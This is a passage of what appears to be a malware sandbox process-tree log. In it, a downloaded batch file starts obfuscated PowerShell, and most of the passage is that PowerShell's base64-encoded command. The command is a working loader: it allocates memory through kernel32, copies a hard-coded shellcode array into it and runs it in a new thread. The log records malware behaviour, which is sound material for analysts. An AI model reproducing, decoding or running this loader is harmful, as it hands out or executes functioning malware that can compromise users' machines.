ALAAwAHgAOAAyACwAMAB4AGMAZgAsADAAeAA1AGMALAAwAHgAOQBjACwAMAB4ADYANwAsADAAeABmAGUALAAwAHgANABlACwAMAB4AGYAYQAsADAAeABlAGMALAAwAHgANQAzACwAMAB4ADUAZgAsADAAeAA4ADgALAAwAHgAYQAwACwAMAB4ADUAZgAsADAAeAAxADQALAAwAHgAZABjACwAMAB4ADUAMAAsADAAeABlAGIALAAwAHgANQA4ACwAMAB4AGMAOQAsADAAeAA2ADkALAAwAHgAMQA0ACwAMAB4ADkAMwAsADAAeABiAGUALAAwAHgAYwAzACwAMAB4AGMAYwAsADAAeAA5AGQALAAwAHgAMAAwACwAMAB4ADcAZgAsADAAeAAyAGMALAAwAHgAYgBmACwAMAB4AGYAYwAsADAAeAA3AGQALAAwAHgANgAxACwAMAB4ADEAZgAsADAAeAAzAGMALAAwAHgANABlACwAMAB4ADcANAAsADAAeAA1AGUALAAwAHgANwA5ACwAMAB4ADEAOQAsADAAeABmADIALAAwAHgAOABmACwAMAB4AGQANwAsADAAeAAxADIALAAwAHgAYQBlACwAMAB4ADUAZgAsADAAeAA1ADMALAAwAHgANgA2ACwAMAB4ADcAMwAsADAAeAA2ADEALAAwAHgAYgAzACwAMAB4ADMAMQAsADAAeAAwADAALAAwAHgAMgAxACwAMAB4ADQAYgAsADAAeAAzADgALAAwAHgAZAA2ACwAMAB4AGQANgAsADAAeABlADcALAAwAHgANAAzACwAMAB4ADAANwAsADAAeAA5AGQALAAwAHgAYQAwACwAMAB4ADYAMwAsADAAeABmADcALAAwAHgAMgA5ACwAMAB4ADEAOAAsADAAeAA3AGIALAAwAHgAZgA2ACwAMAB4AGYAZQAsADAAeAAxAGMALAAwAHgAYgAyACwAMAB4ADgAYwAsADAAeAAzAGMALAAwAHgAMgBlACwAMAB4AGIAYgAsADAAeAAyADQALAAwAHgAYgA2ACwAMAB4ADYANAAsADAAeABjADgALAAwAHgAYgA2ACwAMAB4ADEAZQAsADAAeABiADUALAAwAHgAMABlACwAMAB4ADcAOQAsADAAeAA1ADEALAAwAHgAYgBiACwAMAB4ADIAMgAsADAAeAA3AGIALAAwAHgAYQA5ACwAMAB4AGYAYwAsADAAeABkAGEALAAwAHgAMAA5ACwAMAB4AGMAMQAsADAAeABmAGUALAAwAHgANgA3ACwAMAB4ADAAYQAsADAAeAAxADIALAAwAHgANwBjACwAMAB4AGIAMwAsADAAeAA5AGYALAAwAHgAOAA1ACwAMAB4ADIANgAsADAAeAAzADAALAAwAHgAMAA3ACwAMAB4ADYAMgAsADAAeABkADYALAAwAHgAOQA1ACwAMAB4AGQAZQAsADAAeABlADEALAAwAHgAZAA0ACwAMAB4ADUAMgAsADAAeAA5ADQALAAwAHgAYQBlACwAMAB4AGYAOAAsADAAeAA2ADUALAAwAHgANwA5ACwAMAB4AGMANQAsADAAeAAwADUALAAwAHgAZQBlACwAMAB4ADcAYwAsADAAeAAwAGEALAAwAHgAOABjACwAMAB4AGIANAAsADAAeAA1AGEALAAwAHgAOABlACwAMAB4AGQANAAsADAAeAA2AGYALAAwAHgAYwAyACwAMAB4ADkANwAsADAAeABiADAALAAwAHgAZABlACwAMAB4AGYAYgAsADAAeABjADgALAAwAHgAMQBkACwAMAB4AGIAZgAsADAAeAA1ADkALAAwAHgAOAAyACwAMAB4ADgAYwAsADAAeABkADYALAAwAHgAZABlACwAMAB4ADYAYgAsADAAeAA0AGYALAAwAHgAZAA3ACwAMAB4ADgAMgAsADAAeABmAGIALAAwAHgAOAAzACwAMAB4ADEANQAsADAAeAAzAGQALAAwAHgAZgBjACwAMAB4ADgAYgAsADAAeAAyAGUALAAwAHgANABlACwAMAB4AGMAZQAsADAAeAAxADQALAAwAHgAOAA0ACwAMAB4AGQAOAAsADAAeAA2ADIALAAwAHgAZABjACwAMAB4ADAAMgAsADAAeAAxAGUALAAwAHgAZgAyACwAMAB4AGMAYQAsADAAeABiADUALAAwAHgAZgAwACwAMAB4AGIAYwAsADAAeAA5AGIALAAwAHgANAA4ACwAMAB4AGYAMQAsADAAeABiAGMALAAwAHgAYgAyACwAMAB4ADgAZQAsADAAeABhADUALAAwAHgAZQBjACwAMAB4AGEAYwAsADAAeAAyADcALAAwAHgAYwA2ACwAMAB4ADYANgAsADAAeAAyAGQALAAwAHgAYwA4ACwAMAB4ADEAMwAsADAAeAAxADIALAAwAHgAMgA3ACwAMAB4ADUAZQAsADAAeAA1AGMALAAwAHgANABiACwAMAB4ADYAZgAsADAAeAAxAGUALAAwAHgAMwA0ACwAMAB4ADgAZQAsADAAeAA5ADAALAAwAHgAMQBhACwAMAB4ADcAOQAsADAAeAAwADcALAAwAHgANwA2ACwAMAB4ADcAMgAsADAAeABkADEALAAwAHgANAA4ACwAMAB4ADIANwAsADAAeAAzADIALAAwAHgAOAAxACwAMAB4ADIAOAAsADAAeAA5ADcALAAwAHgAZABhACwAMAB4AGMAYgAsADAAeABhADYALAAwAHgAYwA4ACwAMAB4AGYAYQAsADAAeABmADMALAAwAHgANgBjACwAMAB4ADYAMQAsADAAeAA5ADAALAAwAHgAMQBiACwAMAB4AGQAOQAsADAAeABkADkALAAwAHgAMABjACwAMAB4ADgANQAsADAAeAA0ADAALAAwAHgAOQAxACwAMAB4AGEAZAAsADAAeAA0AGEALAAwAHgANQBmACwAMAB4AGQAZgAsADAAeABlAGQALAAwAHgAYwAxACwAMAB4ADYAYwAsADAAeAAxAGYALAAwAHgAYQAzACwAMAB4ADIAMQAsADAAeAAxADgALAAwAHgAMwAzACwAMAB4ADUAMwAsADAAeABjADIALAAwAHgANQA3ACwAMAB4ADYAOQAsADAAeABmADUALAAwAHgAZABkACwAMAB4ADQAZAAsADAAeAAwADQALAAwAHgAZgA5ACwAMAB4ADQAYgAsADAAeAA2AGEALAAwAHgAOABmACwAMAB4AGEAZQAsADAAeABlADMALAAwAHgANwAwACwAMAB4AGYANgAsADAAeAA5ADgALAAwAHgAYQBiACwAMAB4ADgAYgAsADAAeABkAGQALAAwAHgAOQAzACwAMAB4ADYAMgAsADAAeAAxAGUALAAwAHgAOQBlACwAMAB4AGMAYgAsADAAeAA4AGEALAAwAHgAYwBlACwAMAB4ADEAZQAsADAAeAAwAGIALAAwAHgAZABkACwAMAB4ADgANAAsADAAeAAxAGUALAAwAHgANgAzACwAMAB4AGIAOQAsADAAeABmAGMALAAwAHgANABjACwAMAB4ADkANgAsADAAeABjADYALAAwAHgAMgA4ACwAMAB4AGUAMQAsADAAeAAwAGIALAAwAHgANQAzACwAMAB4AGQAMwAsADAAeAA1ADAALAAwAHgAZgA4ACwAMAB4AGYANAAsADAAeABiAGIALAAwAHgANQBlACwAMAB4ADIANwAsADAAeAAzADIALAAwAHgANgA0ACwAMAB4AGEAMAAsADAAeAAwADIALAAwAHgAYwAyACwAMAB4ADUAOAAsADAAeAA3ADcALAAwAHgANgBhACwAMAB4AGIAMAAsADAAeABiADAALAAwAHgANABiADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABVAGYAbQB5AD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABVAGYAbQB5AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABVAGYAbQB5ACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==
5⤵
PID:7784

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yyyjqvze\yyyjqvze.cmdline"
6⤵
PID:7836

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES77CE.tmp" "c:\Users\Admin\AppData\Local\Temp\yyyjqvze\CSCCCA35651107143D6A5F1AD4F691B2349.TMP"
7⤵
PID:5836

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=900 --field-trial-handle=1800,i,9668161945993928981,2973005954216947799,131072 /prefetch:8
2⤵
PID:9052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\hello.bat" "
2⤵
PID:8536

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 -C "sv lI -;sv mJz ec;sv qgU ((gv lI).value.toString()+(gv mJz).value.toString());powershell (gv qgU).value.toString() 'JABGAFEAcwAgAD0AIAAnACQAWQBmAEEAagAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABZAGYAQQBqACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAAxADMALAAwAHgAZAA4ACwAMAB4AGMAYQAsADAAeAAxAGUALAAwAHgAZABiACwAMAB4AGMAZgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBiACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAA4ADMALAAwAHgAYwAzACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANwAzACwAMAB4ADAAZQAsADAAeAAwADMALAAwAHgANgAwACwAMAB4AGQANgAsADAAeAAyADgALAAwAHgAZQBiACwAMAB4ADcAYQAsADAAeAAwAGUALAAwAHgAMgAzACwAMAB4ADEANAAsADAAeAA4ADIALAAwAHgAYwBmACwAMAB4ADUAYwAsADAAeAA5AGMALAAwAHgANgA3ACwAMAB4AGYAZQAsADAAeAA0AGUALAAwAHgAZgBhACwAMAB4AGUAYwAsADAAeAA1ADMALAAwAHgANQBmACwAMAB4ADgAOAAsADAAeABhADAALAAwAHgANQBmACwAMAB4ADEANAAsADAAeABkAGMALAAwAHgANQAwACwAMAB4AGUAYgAsADAAeAA1ADgALAAwAHgAYwA5ACwAMAB4ADYAOQAsADAAeAAxADQALAAwAHgAOQAzACwAMAB4AGIAZQAsADAAeABjADMALAAwAHgAYwBjACwAMAB4ADkAZAAsADAAeAAwADAALAAwAHgANwBmACwAMAB4ADIAYwAsADAAeABiAGYALAAwAHgAZgBjACwAMAB4ADcAZAAsADAAeAA2ADEALAAwAHgAMQBmACwAMAB4ADMAYwAsADAAeAA0AGUALAAwAHgANwA0ACwAMAB4ADUAZQAsADAAeAA3ADkALAAwAHgAMQA5ACwAMAB4AGYAMgAsADAAeAA4AGYALAAwAHgAZAA3ACwAMAB4ADEAMgAsADAAeABhAGUALAAwAHgANQBmACwAMAB4ADUAMwAsADAAeAA2ADYALAAwAHgANwAzACwAMAB4ADYAMQAsADAAeABiADMALAAwAHgAMwAxACwAMAB4ADAAMAAsADAAeAAyADEALAAwAHgANABiACwAMAB4ADMAOAAsADAAeABkADYALAAwAHgAZAA2ACwAMAB4AGUANwAsADAAeAA0ADMALAAwAHgAMAA3ACwAMAB4ADkAZAAsADAAeABhADAALAAwAHgANgAzACwAMAB4AGYANwAsADAAeAAyADkALAAwAHgAMQA4ACwAMAB4ADcAYgAsADAAeABmADYALAAwAHgAZgBlACwAMAB4ADEAYwAsADAAeABiADIALAAwAHgAOABjACwAMAB4ADMAYwAsADAAeAAyAGUALAAwAHgAYgBiACwAMAB4ADIANAAsADAAeABiADYALAAwAHgANgA0ACwAMAB4AGMAOAAsADAAeABiADYALAAwAHgAMQBlACwAMAB4AGIANQAsADAAeAAwAGUALAAwAHgANwA5ACwAMAB4ADUAMQAsADAAeABiAGIALAAwAHgAMgAyACwAMAB4ADcAYgAsADAAeABhADkALAAwAHgAZgBjACwAMAB4AGQAYQAsADAAeAAwADkALAAwAHgAYwAxACwAMAB4AGYAZQAsADAAeAA2ADcALAAwAHgAMABhACwAMAB4ADEAMgAsADAAeAA3AGMALAAwAHgAYgAzACwAMAB4ADkAZgAsADAAeAA4ADUALAAwAHgAMgA2ACwAMAB4ADMAMAAsADAAeAAwADcALAAwAHgANgAyACwAMAB4AGQANgAsADAAeAA5ADUALAAwAHgAZABlACwAMAB4AGUAMQAsADAAeABkADQALAAwAHgANQAyACwAMAB4ADkANAAsADAAeABhAGUALAAwAHgAZgA4ACwAMAB4ADYANQAsADAAeAA3ADkALAAwAHgAYwA1ACwAMAB4ADAANQAsADAAeABlAGUALAAwAHgANwBjACwAMAB4ADAAYQAsADAAeAA4AGMALAAwAHgAYgA0ACwAMAB4ADUAYQAsADAAeAA4AGUALAAwAHgAZAA0ACwAMAB4ADYAZgAsADAAeABjADIALAAwAHgAOQA3ACwAMAB4AGIAMAAsADAAeABkAGUALAAwAHgAZgBiACwAMAB4AGMAOAAsADAAeAAxAGQALAAwAHgAYgBmACwAMAB4ADUAOQAsADAAeAA4ADIALAAwAHgAOABjACwAMAB4AGQANgAsADAAeABkAGUALAAwAHgANgBiACwAMAB4ADQAZgAsADAAeABkADcALAAwAHgAOAAyACwAMAB4AGYAYgAsADAAeAA4ADMALAAwAHgAMQA1ACwAMAB4ADMAZAAsADAAeABmAGMALAAwAHgAOABiACwAMAB4ADIAZQAsADAAeAA0AGUALAAwAHgAYwBlACwAMAB4ADEANAAsADAAeAA4ADQALAAwAHgAZAA4ACwAMAB4ADYAMgAsADAAeABkAGMALAAwAHgAMAAyACwAMAB4ADEAZQAsADAAeABmADIALAAwAHgAYwBhACwAMAB4AGIANQAsADAAeABmADAALAAwAHgAYgBjACwAMAB4ADkAYgAsADAAeAA0ADgALAAwAHgAZgAxACwAMAB4AGIAYwAsADAAeABiADIALAAwAHgAOABlACwAMAB4AGEANQAsADAAeABlAGMALAAwAHgAYQBjACwAMAB4ADIANwAsADAAeABjADYALAAwAHgANgA2ACwAMAB4ADIAZAAsADAAeABjADgALAAwAHgAMQAzACwAMAB4ADEAMgAsADAAeAAyADcALAAwAHgANQBlACwAMAB4ADUAYwAsADAAeAA0AGIALAAwAHgANgBmACwAMAB4ADEAZQAsADAAeAAzADQALAAwAHgAOABlACwAMAB4ADkAMAAsADAAeAAxAGEALAAwAHgANwA5ACwAMAB4ADAANwAsADAAeAA3ADYALAAwAHgANwAyACwAMAB4AGQAMQAsADAAeAA0ADgALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA4ADEALAAwAHgAMgA4ACwAMAB4ADkANwAsADAAeABkAGEALAAwAHgAYwBiACwAMAB4AGEANgAsADAAeABjADgALAAwAHgAZgBhACwAMAB4AGYAMwAsADAAeAA2AGMALAAwAHgANgAxACwAMAB4ADkAMAAsADAAeAAxAGIALAAwAHgAZAA5ACwAMAB4AGQAOQAsADAAeAAwAGMALAAwAHgAOAA1ACwAMAB4ADQAMAAsADAAeAA5ADEALAAwAHgAYQBkACwAMAB4ADQAYQAsADAAeAA1AGYALAAwAHgAZABmACwAMAB4AGUAZAAsADAAeABjADEALAAwAHgANgBjACwAMAB4ADEAZgAsADAAeABhADMALAAwAHgAMgAxACwAMAB4ADEAOAAsADAAeAAzADMALAAwAHgANQAzACwAMAB4AGMAMgAsADAAeAA1ADcALAAwAHgANgA5ACwAMAB4AGYANQAsADAAeABkAGQALAAwAHgANABkACwAMAB4ADAANAAsADAAeABmADkALAAwAHgANABiACwAMAB4ADYAYQAsADAAeAA4AGYALAAwAHgAYQBlACwAMAB4AGUAMwAsADAAeAA3ADAALAAwAHgAZgA2ACwAMAB4ADkAOAAsADAAeABhAGIALAAwAHgAOABiACwAMAB4AGQAZAAsADAAeAA5ADMALAAwAHgANgAyACwAMAB4ADEAZQAsADAAeAA5AGUALAAwAHgAYwBiACwAMAB4ADgAYQAsADAAeABjAGUALAAwAHgAMQBlACwAMAB4ADAAYgAsADAAeABkAGQALAAwAHgAOAA0ACwAMAB4ADEAZQAsADAAeAA2ADMALAAwAHgAYgA5ACwAMAB4AGYAYwAsADAAeAA0AGMALAAwAHgAOQA2ACwAMAB4AGMANgAsADAAeAAyADgALAAwAHgAZQAxACwAMAB4ADAAYgAsADAAeAA1ADMALAAwAHgAZAAzACwAMAB4ADUAMAAsADAAeABmADgALAAwAHgAZgA0ACwAMAB4AGIAYgAsADAAeAA1AGUALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA2ADQALAAwAHgAYQAwACwAMAB4ADAAMgAsADAAeABjADIALAAwAHgANQA4ACwAMAB4ADcANwAsADAAeAA2AGEALAAwAHgAYgAwACwAMAB4AGIAMAAsADAAeAA0AGIAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAFUAZgBtAHkAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFUAZgBtAHkALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFUAZgBtAHkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABGAFEAcwApACkAOwAkAHIAUQB5AGIAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAbgBpAHUAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAbgBpAHUAIAAkAHIAUQB5AGIAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAcgBRAHkAYgAgACQAZQAiADsAfQA='"
3⤵
PID:8772

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABGAFEAcwAgAD0AIAAnACQAWQBmAEEAagAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABZAGYAQQBqACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAAxADMALAAwAHgAZAA4ACwAMAB4AGMAYQAsADAAeAAxAGUALAAwAHgAZABiACwAMAB4AGMAZgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBiACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAA4ADMALAAwAHgAYwAzACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANwAzACwAMAB4ADAAZQAsADAAeAAwADMALAAwAHgANgAwACwAMAB4AGQANgAsADAAeAAyADgALAAwAHgAZQBiACwAMAB4ADcAYQAsADAAeAAwAGUALAAwAHgAMgAzACwAMAB4ADEANAAsADAAeAA4ADIALAAwAHgAYwBmACwAMAB4ADUAYwAsADAAeAA5AGMALAAwAHgANgA3ACwAMAB4AGYAZQAsADAAeAA0AGUALAAwAHgAZgBhACwAMAB4AGUAYwAsADAAeAA1ADMALAAwAHgANQBmACwAMAB4ADgAOAAsADAAeABhADAALAAwAHgANQBmACwAMAB4ADEANAAsADAAeABkAGMALAAwAHgANQAwACwAMAB4AGUAYgAsADAAeAA1ADgALAAwAHgAYwA5ACwAMAB4ADYAOQAsADAAeAAxADQALAAwAHgAOQAzACwAMAB4AGIAZQAsADAAeABjADMALAAwAHgAYwBjACwAMAB4ADkAZAAsADAAeAAwADAALAAwAHgANwBmACwAMAB4ADIAYwAsADAAeABiAGYALAAwAHgAZgBjACwAMAB4ADcAZAAsADAAeAA2ADEALAAwAHgAMQBmACwAMAB4ADMAYwAsADAAeAA0AGUALAAwAHgANwA0ACwAMAB4ADUAZQAsADAAeAA3ADkALAAwAHgAMQA5ACwAMAB4AGYAMgAsADAAeAA4AGYALAAwAHgAZAA3ACwAMAB4ADEAMgAsADAAeABhAGUALAAwAHgANQBmACwAMAB4ADUAMwAsADAAeAA2ADYALAAwAHgANwAzACwAMAB4ADYAMQAsADAAeABiADMALAAwAHgAMwAxACwAMAB4ADAAMAAsADAAeAAyADEALAAwAHgANABiACwAMAB4ADMAOAAsADAAeABkADYALAAwAHgAZAA2ACwAMAB4AGUANwAsADAAeAA0ADMALAAwAHgAMAA3ACwAMAB4ADkAZAAsADAAeABhADAALAAwAHgANgAzACwAMAB4AGYANwAsADAAeAAyADkALAAwAHgAMQA4ACwAMAB4ADcAYgAsADAAeABmADYALAAwAHgAZgBlACwAMAB4ADEAYwAsADAAeABiADIALAAwAHgAOABjACwAMAB4ADMAYwAsADAAeAAyAGUALAAwAHgAYgBiACwAMAB4ADIANAAsADAAeABiADYALAAwAHgANgA0ACwAMAB4AGMAOAAsADAAeABiADYALAAwAHgAMQBlACwAMAB4AGIANQAsADAAeAAwAGUALAAwAHgANwA5ACwAMAB4ADUAMQAsADAAeABiAGIALAAwAHgAMgAyACwAMAB4ADcAYgAsADAAeABhADkALAAwAHgAZgBjACwAMAB4AGQAYQAsADAAeAAwADkALAAwAHgAYwAxACwAMAB4AGYAZQAsADAAeAA2ADcALAAwAHgAMABhACwAMAB4ADEAMgAsADAAeAA3AGMALAAwAHgAYgAzACwAMAB4ADkAZgAsADAAeAA4ADUALAAwAHgAMgA2ACwAMAB4ADMAMAAsADAAeAAwADcALAAwAHgANgAyACwAMAB4AGQANgAsADAAeAA5ADUALAAwAHgAZABlACwAMAB4AGUAMQAsADAAeABkADQALAAwAHgANQAyACwAMAB4ADkANAAsADAAeABhAGUALAAwAHgAZgA4ACwAMAB4ADYANQAsADAAeAA3ADkALAAwAHgAYwA1ACwAMAB4ADAANQAsADAAeABlAGUALAAwAHgANwBjACwAMAB4ADAAYQAsADAAeAA4AGMALAAwAHgAYgA0ACwAMAB4ADUAYQAsADAAeAA4AGUALAAwAHgAZAA0ACwAMAB4ADYAZgAsADAAeABjADIALAAwAHgAOQA3ACwAMAB4AGIAMAAsADAAeABkAGUALAAwAHgAZgBiACwAMAB4AGMAOAAsADAAeAAxAGQALAAwAHgAYgBmACwAMAB4ADUAOQAsADAAeAA4ADIALAAwAHgAOABjACwAMAB4AGQANgAsADAAeABkAGUALAAwAHgANgBiACwAMAB4ADQAZgAsADAAeABkADcALAAwAHgAOAAyACwAMAB4AGYAYgAsADAAeAA4ADMALAAwAHgAMQA1ACwAMAB4ADMAZAAsADAAeABmAGMALAAwAHgAOABiACwAMAB4ADIAZQAsADAAeAA0AGUALAAwAHgAYwB